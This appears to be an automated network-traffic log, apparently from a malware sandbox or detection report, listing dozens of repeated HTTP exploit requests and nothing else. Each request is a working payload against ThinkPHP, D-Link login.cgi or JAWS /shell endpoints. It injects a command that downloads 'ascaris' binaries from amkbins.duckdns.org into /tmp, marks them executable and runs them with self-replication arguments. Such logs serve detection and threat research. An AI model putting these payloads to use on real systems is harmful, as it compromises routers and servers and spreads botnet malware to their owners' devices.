            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
